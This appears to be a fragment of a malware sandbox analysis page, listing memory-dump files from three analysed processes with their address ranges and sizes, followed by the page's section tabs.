memory/908-340-0x000007FEF5820000-0x000007FEF61BD000-memory.dmp

Filesize
9.6MB

Download
memory/908-341-0x000007FEF5820000-0x000007FEF61BD000-memory.dmp

Filesize
9.6MB

Download
memory/908-342-0x000007FEF5820000-0x000007FEF61BD000-memory.dmp

Filesize
9.6MB

Download
memory/908-343-0x000007FEF5820000-0x000007FEF61BD000-memory.dmp

Filesize
9.6MB

Download
memory/908-346-0x000007FEF5820000-0x000007FEF61BD000-memory.dmp

Filesize
9.6MB

Download
memory/908-336-0x000007FEF5ADE000-0x000007FEF5ADF000-memory.dmp

Filesize
4KB

Download
memory/908-358-0x000007FEF5ADE000-0x000007FEF5ADF000-memory.dmp

Filesize
4KB

Download
memory/2172-352-0x00000000740B0000-0x00000000740DF000-memory.dmp

Filesize
188KB

Download
memory/2172-395-0x00000000771D0000-0x00000000772CA000-memory.dmp

Filesize
1000KB

Download
memory/2172-396-0x0000000074270000-0x00000000744E8000-memory.dmp

Filesize
2.5MB

Download
memory/2172-402-0x0000000073FE0000-0x000000007400E000-memory.dmp

Filesize
184KB

Download
memory/2172-403-0x0000000002E40000-0x0000000003A8A000-memory.dmp

Filesize
12.3MB

Download
memory/2172-404-0x0000000072D60000-0x000000007330B000-memory.dmp

Filesize
5.7MB

Download
memory/2172-401-0x0000000074010000-0x000000007403E000-memory.dmp

Filesize
184KB

Download
memory/2172-400-0x0000000074040000-0x00000000740A1000-memory.dmp

Filesize
388KB

Download
memory/2172-398-0x00000000740E0000-0x0000000074270000-memory.dmp

Filesize
1.6MB

Download
memory/2172-397-0x0000000073FF0000-0x0000000074268000-memory.dmp

Filesize
2.5MB

Download
memory/2584-393-0x0000000000570000-0x00000000015D2000-memory.dmp

Filesize
16.4MB

Download
memory/2584-389-0x0000000000570000-0x00000000015D2000-memory.dmp

Filesize
16.4MB

Download
memory/2584-405-0x0000000000570000-0x00000000005B2000-memory.dmp

Filesize
264KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads